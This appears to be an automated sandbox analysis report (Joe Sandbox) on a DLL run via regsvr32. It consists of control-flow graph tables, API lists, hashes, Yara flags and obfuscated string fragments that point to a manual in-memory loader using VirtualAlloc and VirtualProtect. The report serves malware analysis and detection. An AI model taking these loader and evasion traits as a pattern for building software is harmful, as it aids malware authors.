MultiByteToWideChar 17401->17402 17402->17400 17404 7fef9d3ee62 17403->17404 17406 7fef9d3ee6e 17404->17406 17407 7fef9d3f360 17404->17407 17406->17386 17408 7fef9d3f719 17407->17408 17409 7fef9d3f399 17407->17409 17411 7fef9d40170 23 API calls 17408->17411 17442 7fef9d3f4f2 17408->17442 17410 7fef9d3afb0 _fflush_nolock 17 API calls 17409->17410 17412 7fef9d3f3a6 17410->17412 17411->17442 17413 7fef9d3f3ed 17412->17413 17415 7fef9d3afb0 _fflush_nolock 17 API calls 17412->17415 17418 7fef9d3f4c7 17413->17418 17419 7fef9d3afb0 _fflush_nolock 17 API calls 17413->17419 17414 7fef9d23280 __GSHandlerCheck 8 API calls 17416 7fef9d3f7c5 17414->17416 17417 7fef9d3f3b8 17415->17417 17416->17406 17417->17413 17420 7fef9d3afb0 _fflush_nolock 17 API calls 17417->17420 17421 7fef9d40170 23 API calls 17418->17421 17418->17442 17422 7fef9d3f43d 17419->17422 17423 7fef9d3f3ca 17420->17423 17421->17442 17424 7fef9d3f484 17422->17424 17426 7fef9d3afb0 _fflush_nolock 17 API calls 17422->17426 17425 7fef9d3afb0 _fflush_nolock 17 API calls 17423->17425 17424->17418 17427 7fef9d3f561 17424->17427 17425->17413 17428 7fef9d3f44f 17426->17428 17429 7fef9d3afb0 _fflush_nolock 17 API calls 17427->17429 17428->17424 17430 7fef9d3afb0 _fflush_nolock 17 API calls 17428->17430 17431 7fef9d3f56e 17429->17431 17432 7fef9d3f461 17430->17432 17433 7fef9d3f5b8 17431->17433 17434 7fef9d3afb0 _fflush_nolock 17 API calls 17431->17434 17435 7fef9d3afb0 _fflush_nolock 17 API calls 17432->17435 17433->17408 17437 7fef9d3f604 17433->17437 17436 7fef9d3f580 17434->17436 17435->17424 17436->17433 17439 7fef9d3afb0 _fflush_nolock 17 API calls 17436->17439 17438 7fef9d3b530 wctomb_s 19 API calls 17437->17438 17438->17442 17440 7fef9d3f592 17439->17440 17441 7fef9d3afb0 _fflush_nolock 17 API calls 17440->17441 17441->17433 17442->17414 18442 7fef9d41370 18443 7fef9d3af60 _unlock_file2 2 API calls 18442->18443 18444 7fef9d41390 18443->18444 16612 7fef9d28860 HeapCreate 16613 7fef9d28891 GetVersion 16612->16613 16614 7fef9d2888d 16612->16614 16615 7fef9d288c1 16613->16615 16616 7fef9d288a7 HeapSetInformation 16613->16616 16615->16614 16616->16615 18445 7fef9d31b64 18447 7fef9d31b9d 18445->18447 18446 7fef9d3ab10 17 API calls 18448 7fef9d31c86 18446->18448 18447->18446 18447->18448 18449 7fef9d31bed 18447->18449 18448->18449 18450 7fef9d39290 23 API calls 18448->18450 18450->18449 18877 7fef9d35260 18878 7fef9d35296 __SehTransFilter _CreateFrameInfo 18877->18878 18879 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 18878->18879 18880 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18879->18880 17443 7fef9d41160 17446 7fef9d34e90 17443->17446 17445 7fef9d41179 17447 7fef9d34ebb 17446->17447 17448 7fef9d34ecf 17446->17448 17447->17448 17449 7fef9d2cf50 terminate 35 API calls 17447->17449 17448->17445 17449->17448 18458 7fef9d3bb66 18459 7fef9d3bb78 _CrtMemDumpAllObjectsSince wcsxfrm 18458->18459 18460 7fef9d3bc46 18459->18460 18462 7fef9d3b99c 18459->18462 18461 7fef9d2bd70 _invalid_parameter 17 API calls 18460->18461 18466 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18461->18466 18463 7fef9d3cc93 18462->18463 18467 7fef9d3bada 18462->18467 18464 7fef9d2bd70 _invalid_parameter 17 API calls 18463->18464 18463->18466 18464->18466 18465 7fef9d23280 __GSHandlerCheck 8 API calls 18468 7fef9d3cd90 18465->18468 18466->18465 18469 7fef9d2bd70 _invalid_parameter 17 API calls 18467->18469 18469->18466

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                                  • String ID: %<$Ya]$g@$$|X$ 4bB$!@C+$"V2$#z$U$$931$$:*:$$D1v$$huN$$}%z$%8#$%</$%U9$&\hR$*hH%$+ong$+iT$-{*$-'C$.#($0kj.$0.3$1\u$2s<S$3ob$5qj'$5vCx$8<-$:!@$:'U@$:9m?$;qdf$<)@P$<M}O$<v:$=kf^$>~$?CE`$@ $BxJr$C/$Cb47$D)'U$Eekg$FLIn$HPZ$Ko*h$L ]1$M13U$M1vi$MDj$N1kj^H<M1vf@$_yiXP+o*hH*fZQl5vC5qjfXErgxjcCb4v_e75<edkge!z$U9k+h$P+oo$PX5$Puvm$QlyO$R;pB$S[L$S}pn$U+on$U9#($V#s$V9s$VO4$^*C$`AnM$aUJ'$c-_j$cDj$e7tc$ePO$gVWH$h78<$hx"$j+h$kxfc$l|f$mCl4$mbPv$pAT#$rkE@$t(O$tc`$w&ed$wC54$werfault.exe$wk/$xA\#${$U|${fM$$|e:$} z$$}'6$}WL$It$"!k$%Uc$(pd$*hH$,$n$,1.$9[+$?x?$EBg$M z$N3$Pl5$i~e$jfX$oE$`I
                                                  • API String ID: 2181984824-2032897877
                                                  • Opcode ID: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                  • Instruction ID: 1e3beb4b4c43f569e156fbbbb3a48c6786d138466eab30fa5612b4063b7ac052
                                                  • Opcode Fuzzy Hash: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                  • Instruction Fuzzy Hash: 72E2C9B690A7C18FE3748F629E857DD3AA0F345748F609208D3991FA1DCB795242CF86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 15 3b0000-3b0460 call 3b0aa8 * 2 VirtualAlloc 37 3b048a-3b0494 15->37 38 3b0462-3b0466 15->38 41 3b049a-3b049e 37->41 42 3b0a91-3b0aa6 37->42 39 3b0468-3b0488 38->39 39->37 39->39 41->42 43 3b04a4-3b04a8 41->43 43->42 44 3b04ae-3b04b2 43->44 44->42 45 3b04b8-3b04bf 44->45 45->42 46 3b04c5-3b04d2 45->46 46->42 47 3b04d8-3b04e1 46->47 47->42 48 3b04e7-3b04f4 47->48 48->42 49 3b04fa-3b0507 48->49 50 3b0509-3b0511 49->50 51 3b0531-3b0567 GetNativeSystemInfo 49->51 52 3b0513-3b0518 50->52 51->42 53 3b056d-3b0589 VirtualAlloc 51->53 56 3b051a-3b051f 52->56 57 3b0521 52->57 54 3b058b-3b059e 53->54 55 3b05a0-3b05ac 53->55 54->55 58 3b05af-3b05b2 55->58 59 3b0523-3b052f 56->59 57->59 61 3b05c1-3b05db 58->61 62 3b05b4-3b05bf 58->62 59->51 59->52 63 3b061b-3b0622 61->63 64 3b05dd-3b05e2 61->64 62->58 66 3b06db-3b06e2 63->66 67 3b0628-3b062f 63->67 65 3b05e4-3b05ea 64->65 68 3b060b-3b0619 65->68 69 3b05ec-3b0609 65->69 71 3b06e8-3b06f9 66->71 72 3b0864-3b086b 66->72 67->66 70 3b0635-3b0642 67->70 68->63 68->65 69->68 69->69 70->66 75 3b0648-3b064f 70->75 76 3b0702-3b0705 71->76 73 3b0871-3b087f 72->73 74 3b0917-3b0929 72->74 81 3b090e-3b0911 73->81 79 3b092f-3b0937 74->79 80 3b0a07-3b0a1a 74->80 82 3b0654-3b0658 75->82 77 3b06fb-3b06ff 76->77 78 3b0707-3b070a 76->78 77->76 84 3b0788-3b078e 78->84 85 3b070c-3b071d 78->85 87 3b093b-3b093f 79->87 99 3b0a1c-3b0a27 80->99 100 3b0a40-3b0a4a 80->100 81->74 86 3b0884-3b08a9 81->86 83 3b06c0-3b06ca 82->83 91 3b065a-3b0669 83->91 92 3b06cc-3b06d2 83->92 89 3b0794-3b07a2 84->89 88 3b071f-3b0720 85->88 85->89 107 3b08ab-3b08b1 86->107 108 3b0907-3b090c 86->108 93 3b09ec-3b09fa 87->93 94 3b0945-3b095a 87->94 98 3b0722-3b0784 88->98 101 3b07a8 89->101 102 3b085d-3b085e 89->102 95 3b066b-3b0678 91->95 96 3b067a-3b067e 91->96 92->82 103 3b06d4-3b06d5 92->103 93->87 97 3b0a00-3b0a01 93->97 105 3b097b-3b097d 94->105 106 3b095c-3b095e 94->106 111 3b06bd-3b06be 95->111 112 3b068c-3b0690 96->112 113 3b0680-3b068a 96->113 97->80 98->98 116 3b0786 98->116 117 3b0a38-3b0a3e 99->117 119 3b0a7b-3b0a8e 100->119 120 3b0a4c-3b0a54 100->120 118 3b07ae-3b07d4 101->118 102->72 103->66 114 3b097f-3b0981 105->114 115 3b09a2-3b09a4 105->115 109 3b096e-3b0979 106->109 110 3b0960-3b096c 106->110 129 3b08bb-3b08c8 107->129 130 3b08b3-3b08b9 107->130 108->81 121 3b09be-3b09bf 109->121 110->121 111->83 125 3b0692-3b06a3 112->125 126 3b06a5-3b06a9 112->126 122 3b06b6-3b06ba 113->122 123 3b0989-3b098b 114->123 124 3b0983-3b0987 114->124 127 3b09ac-3b09bb 115->127 128 3b09a6-3b09aa 115->128 116->89 117->100 131 3b0a29-3b0a35 117->131 146 3b07d6-3b07d9 118->146 147 3b0835-3b0839 118->147 119->42 120->119 132 3b0a56-3b0a78 120->132 136 3b09c5-3b09cb 121->136 122->111 123->115 134 3b098d-3b098f 123->134 124->121 125->122 126->111 135 3b06ab-3b06b3 126->135 127->121 128->121 138 3b08ca-3b08d1 129->138 139 3b08d3-3b08e5 129->139 137 3b08ea-3b08fe 130->137 131->117 132->119 141 3b0999-3b09a0 134->141 142 3b0991-3b0997 134->142 135->122 143 3b09d9-3b09e9 VirtualProtect 136->143 144 3b09cd-3b09d3 136->144 137->108 154 3b0900-3b0905 137->154 138->138 138->139 139->137 141->136 142->121 143->93 144->143 151 3b07db-3b07e1 146->151 152 3b07e3-3b07f0 146->152 148 3b083b 147->148 149 3b0844-3b0850 147->149 148->149 149->118 153 3b0856-3b0857 149->153 155 3b0812-3b082c 151->155 156 3b07fb-3b080d 152->156 157 3b07f2-3b07f9 152->157 153->102 154->107 155->147 159 3b082e-3b0833 155->159 156->155 157->156 157->157 159->146
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.925942148.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_3b0000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                  • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                  • API String ID: 2313188843-2517549848
                                                  • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                  • Instruction ID: 9afc1e300d741774a680026ef55b814baa8c9bc1b53663ca5f48fe88e5bb128d
                                                  • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                  • Instruction Fuzzy Hash: 6A72C430618B488BDB2DDF18C8856FAB7E1FB98305F10462EE9CAD7611DB34D946CB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 344 18002b7b2-18002b823 call 1800075b8 346 18002b828-18002b836 344->346 347 18002b83c-18002b848 346->347 348 18002b769-18002b76f 347->348 349 18002b775 348->349 350 18002b9bc-18002b9c2 348->350 351 18002b77b-18002b781 349->351 352 18002be19-18002be67 call 180024104 349->352 353 18002bdb2-18002bdfb call 180024104 350->353 354 18002b9c8-18002b9ce 350->354 355 18002b9b2-18002b9b7 351->355 356 18002b787-18002b78d 351->356 367 18002be6c-18002be8c 352->367 374 18002be00-18002be09 353->374 357 18002b9d4-18002b9da 354->357 358 18002bc32-18002bdb0 call 180003a18 call 18001958c 354->358 355->348 362 18002b793-18002b799 356->362 363 18002b91c-18002b9a3 call 18001a6a8 356->363 364 18002bb99-18002bc22 call 180029374 357->364 365 18002b9e0-18002b9e6 357->365 358->374 370 18002b867-18002b917 call 180029374 362->370 371 18002b79f-18002b7a5 362->371 377 18002b9a8-18002b9ad 363->377 364->367 384 18002bc28-18002bc2d 364->384 372 18002be0c-18002be12 365->372 373 18002b9ec-18002bafc call 180018fd8 365->373 370->347 379 18002b7ab-18002b7b1 371->379 380 18002b84d-18002b862 371->380 372->367 382 18002be14 372->382 373->377 388 18002bb02-18002bb94 call 180013fc0 373->388 374->372 377->347 379->344 379->372 380->348 382->348 384->347 388->347
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: j$BaG$E^7$i1V$m?${=/
                                                  • API String ID: 0-1718370006
                                                  • Opcode ID: 7e95e28927a3f474dec44438ef6f7c2193a6ae12a65f48f1ee29bcd4551fec0f
                                                  • Instruction ID: c2786c6f7bce021451845d5168b6505f680b7f0c5368ce25f063ff62f9696b2b
                                                  • Opcode Fuzzy Hash: 7e95e28927a3f474dec44438ef6f7c2193a6ae12a65f48f1ee29bcd4551fec0f
                                                  • Instruction Fuzzy Hash: 64223B70E4870DDBCB59DFA8C4AA6DEBBF6FB44344F0081A9D805A7290DB74560ACB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $E$&C$b $z_o^$]o-
                                                  • API String ID: 0-182765021
                                                  • Opcode ID: fd2830ddd061059d70b3ed5c5ef2773e5c4c00071749e16c1f80641060217d81
                                                  • Instruction ID: b82cae2a5c5b3167ef3d8ad315f999371e1e8449cd72bf967428ee4211bfb190
                                                  • Opcode Fuzzy Hash: fd2830ddd061059d70b3ed5c5ef2773e5c4c00071749e16c1f80641060217d81
                                                  • Instruction Fuzzy Hash: 5CE1277151468CDFDF88DF28C889ADD3BA1FB483A8F956219FD0A97250D774D888CB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8$?I $k?@`${>K$s
                                                  • API String ID: 0-923624899
                                                  • Opcode ID: 59fac920170ce31af9fc739010187020a0354a51edcd4550f4f509655bae4bf8
                                                  • Instruction ID: ebffd08f5432af4d9268e2276ec0df8890e8c351c8fd12e1d0a52c84a5ba0a07
                                                  • Opcode Fuzzy Hash: 59fac920170ce31af9fc739010187020a0354a51edcd4550f4f509655bae4bf8
                                                  • Instruction Fuzzy Hash: F4C1F070519784ABC388DF24C4CA95BBBF1FBD4758F906A1CF9C68A260D774D948CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 441 18000e99c-18000e9ca 442 18000e9cc 441->442 443 18000e9ce-18000e9d4 442->443 444 18000e9da-18000e9e0 443->444 445 18000ee1d-18000f007 call 1800138d0 call 180028908 443->445 446 18000ee13-18000ee18 444->446 447 18000e9e6-18000e9ec 444->447 462 18000f009 445->462 463 18000f00e-18000f202 call 180028908 call 180017d54 445->463 446->443 449 18000e9f2-18000e9f8 447->449 450 18000ea99-18000eaa6 447->450 452 18000f20d-18000f213 449->452 453 18000e9fe-18000ea89 call 180028724 449->453 455 18000eaa8-18000eaae 450->455 456 18000eab0-18000ead3 450->456 452->443 457 18000f219-18000f226 452->457 453->457 465 18000ea8f-18000ea94 453->465 460 18000ead9-18000edf1 call 180001000 call 180028908 call 180017d54 455->460 456->460 475 18000edf6-18000edfe 460->475 462->463 463->442 474 18000f208 463->474 465->443 474->452 475->457 476 18000ee04-18000ee0e 475->476 476->443
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &k8$,8$\$`/U
                                                  • API String ID: 0-956392518
                                                  • Opcode ID: 342d408fbb0085f8b5c961c7b7314e28d99ae80dc1fdc32ae007dfb548a83613
                                                  • Instruction ID: eb6f1617cd975c6e10cf27e40abea16f203efbb492656816d2660eb5cb9ff966
                                                  • Opcode Fuzzy Hash: 342d408fbb0085f8b5c961c7b7314e28d99ae80dc1fdc32ae007dfb548a83613
                                                  • Instruction Fuzzy Hash: 7D2215715093C88BDBBECF64C889BDA7BB9FB44708F10561CEA4A9E258DB745748CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 477 7fef9d28860-7fef9d2888b HeapCreate 478 7fef9d28891-7fef9d288a5 GetVersion 477->478 479 7fef9d2888d-7fef9d2888f 477->479 481 7fef9d288c1 478->481 482 7fef9d288a7-7fef9d288bb HeapSetInformation 478->482 480 7fef9d288c6-7fef9d288ca 479->480 481->480 482->481
                                                  APIs
                                                  • HeapCreate.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28876
                                                  • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28891
                                                  • HeapSetInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D288BB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Heap$CreateInformationVersion
                                                  • String ID:
                                                  • API String ID: 3563531100-0
                                                  • Opcode ID: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                  • Instruction ID: 9235811b63a60011062a1442a231d54292fe2d432e51c42db702af6c27d11e97
                                                  • Opcode Fuzzy Hash: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                  • Instruction Fuzzy Hash: 50F0FE74A18A4282F7949729AC0977E63D0B758345FA1C43696CD826B4DF3F9589C601
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 483 180025a4c-180025a83 484 180025a85-180025a8a 483->484 485 180025f34-180025f39 call 180016da8 484->485 486 180025a90-180025a95 484->486 497 180025f3e-180025f43 485->497 487 180025a9b-180025aa0 486->487 488 180025e5e-180025f2f call 180029374 486->488 490 180025e35-180025e53 487->490 491 180025aa6-180025aab 487->491 488->484 490->488 494 180025ab1-180025ab6 491->494 495 180025cff-180025e1c call 180001000 491->495 499 180025abc-180025ac1 494->499 500 180025cf0-180025cfa 494->500 503 180025e21-180025e30 495->503 501 180025f49 497->501 502 180026060-18002606d 497->502 504 180025c24-180025ce1 call 18001958c 499->504 505 180025ac7-180025acc 499->505 500->484 501->484 503->484 509 180025ce6-180025ceb 504->509 507 180025ad2-180025ad7 505->507 508 180025f4e-18002605a call 180028724 call 18001c064 505->508 507->497 511 180025add-180025bf1 call 180020048 507->511 508->502 509->484 515 180025bf6-180025bfc 511->515 517 180025c1a-180025c1f 515->517 518 180025bfe-180025c15 515->518 517->484 518->484
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6"*n$US8$z:7
                                                  • API String ID: 0-1851205513
                                                  • Opcode ID: 1606357dec85794d189ee26d92c7f71c49412cbd8f38d505c9803facb48510e7
                                                  • Instruction ID: 607295142d9547307d046de48b3748fa472aee76cf77032a28cf9f5936a2d7e5
                                                  • Opcode Fuzzy Hash: 1606357dec85794d189ee26d92c7f71c49412cbd8f38d505c9803facb48510e7
                                                  • Instruction Fuzzy Hash: 57E1F9706057889FEBBADF24C88A7DE7BA1FB49744F50422DDC8A8E250DB745648CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 519 180020118-180020142 520 180020147-18002014c 519->520 521 180020152-180020157 520->521 522 180020380-1800203f5 call 1800075b8 520->522 523 180020358-180020366 521->523 524 18002015d-180020162 521->524 535 180020401 522->535 536 1800203f7-1800203fc 522->536 526 18002036c-180020370 523->526 527 180020412-180020484 call 18001958c 524->527 528 180020168-18002016d 524->528 533 180020372-18002037b 526->533 534 180020368-180020369 526->534 537 180020489-180020495 527->537 531 180020173-180020178 528->531 532 18002034e-180020353 528->532 538 1800202c8-180020349 call 18001958c 531->538 539 18002017e-180020183 531->539 532->520 533->520 534->526 540 180020406-18002040b 535->540 536->520 538->520 543 180020189-18002018e 539->543 544 18002021d-1800202ad call 180020048 539->544 540->537 541 18002040d 540->541 541->520 543->540 546 180020194-180020218 call 1800011f4 543->546 548 1800202b2-1800202b8 544->548 546->520 548->537 550 1800202be-1800202c3 548->550 550->520
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -;$-;$00
                                                  • API String ID: 0-2539125404
                                                  • Opcode ID: 4bebef8070dd7c101eddf85a5aa64f5999e83061b5374efcb24450239016e0dd
                                                  • Instruction ID: 193f60ccd2842279d11af0df6a42cb9b90b2b7ab7c379db6368ea7840d008f1f
                                                  • Opcode Fuzzy Hash: 4bebef8070dd7c101eddf85a5aa64f5999e83061b5374efcb24450239016e0dd
                                                  • Instruction Fuzzy Hash: 28A1377051478CDBDBAADF28C8C9AD93BA1FF48394FA05219FD0287251CB75D985CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: f+hb$zm
                                                  • API String ID: 0-4294548274
                                                  • Opcode ID: 6963b25ea24f854b6089165216e044e7a65ef6823e0c7b2cadf5353a03fffeac
                                                  • Instruction ID: b2f4f577a3df5b024e80de80ecfd692f42b94ed80d4232126a84951cd6e5a716
                                                  • Opcode Fuzzy Hash: 6963b25ea24f854b6089165216e044e7a65ef6823e0c7b2cadf5353a03fffeac
                                                  • Instruction Fuzzy Hash: 4852C97050068D8FDF98DF68C8866DA3BA1FB58388F124319FC8AA7291D778D655CBC4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #U6
                                                  • API String ID: 0-3443268899
                                                  • Opcode ID: e6a0a67d4c68fd780a130b425ea3d31e719d89ab7dc9c3de49232e364b014bec
                                                  • Instruction ID: 59d24509ec93e958c93c94dd97d6e32fc772fd919bc53da4f0cdd3954875abf9
                                                  • Opcode Fuzzy Hash: e6a0a67d4c68fd780a130b425ea3d31e719d89ab7dc9c3de49232e364b014bec
                                                  • Instruction Fuzzy Hash: 57510E715087888BC7B8DF28C49A6CBBBF1FF86344F10091DE68987260CB76D949CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 160 7fef9d27640-7fef9d27671 GetStartupInfoW call 7fef9d24980 162 7fef9d27676-7fef9d27687 160->162 163 7fef9d27693-7fef9d276ac 162->163 164 7fef9d27689-7fef9d2768e 162->164 166 7fef9d276c2-7fef9d276d7 163->166 165 7fef9d27cee-7fef9d27cf5 164->165 167 7fef9d2777d-7fef9d27784 166->167 168 7fef9d276dd-7fef9d27778 166->168 170 7fef9d27ad6-7fef9d27afb 167->170 171 7fef9d2778a-7fef9d27790 167->171 168->166 174 7fef9d27b01-7fef9d27b2e 170->174 175 7fef9d27ce0-7fef9d27cec SetHandleCount 170->175 171->170 172 7fef9d27796-7fef9d277de 171->172 176 7fef9d277f0 172->176 177 7fef9d277e0-7fef9d277ee 172->177 178 7fef9d27b30-7fef9d27b3c 174->178 179 7fef9d27b42-7fef9d27b56 174->179 175->165 180 7fef9d277fb-7fef9d27833 176->180 177->180 178->179 181 7fef9d27cc0-7fef9d27cd8 178->181 182 7fef9d27b65-7fef9d27b6d 179->182 183 7fef9d27b58-7fef9d27b63 179->183 186 7fef9d27975-7fef9d279c7 180->186 187 7fef9d27839-7fef9d2786e call 7fef9d24980 180->187 188 7fef9d27cdb 181->188 189 7fef9d27b6f-7fef9d27b7a 182->189 190 7fef9d27b7c 182->190 185 7fef9d27b95-7fef9d27bb3 GetStdHandle 183->185 191 7fef9d27c95-7fef9d27cb7 185->191 192 7fef9d27bb9-7fef9d27bc2 185->192 186->170 196 7fef9d279cd-7fef9d279d9 186->196 203 7fef9d27870-7fef9d2787d 187->203 204 7fef9d27882-7fef9d278ac 187->204 188->175 195 7fef9d27b87-7fef9d27b8e 189->195 190->195 198 7fef9d27cbe 191->198 192->191 197 7fef9d27bc8-7fef9d27be5 GetFileType 192->197 195->185 200 7fef9d27ad1 196->200 201 7fef9d279df-7fef9d279eb 196->201 197->191 202 7fef9d27beb-7fef9d27c0d 197->202 198->188 200->170 201->200 205 7fef9d279f1-7fef9d27a01 201->205 206 7fef9d27c0f-7fef9d27c29 202->206 207 7fef9d27c2b-7fef9d27c3a 202->207 203->186 208 7fef9d278c2-7fef9d278e3 204->208 205->200 209 7fef9d27a07-7fef9d27a17 205->209 210 7fef9d27c56-7fef9d27c72 InitializeCriticalSectionAndSpinCount 206->210 207->210 211 7fef9d27c3c-7fef9d27c53 207->211 212 7fef9d27970 208->212 213 7fef9d278e9-7fef9d2796b 208->213 215 7fef9d27a32-7fef9d27aad InitializeCriticalSectionAndSpinCount 209->215 216 7fef9d27a19-7fef9d27a2c GetFileType 209->216 217 7fef9d27c74-7fef9d27c79 210->217 218 7fef9d27c7b-7fef9d27c93 210->218 211->210 212->186 213->208 219 7fef9d27aaf-7fef9d27ab4 215->219 220 7fef9d27ab9-7fef9d27ace 215->220 216->200 216->215 217->165 218->198 219->165 220->200
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
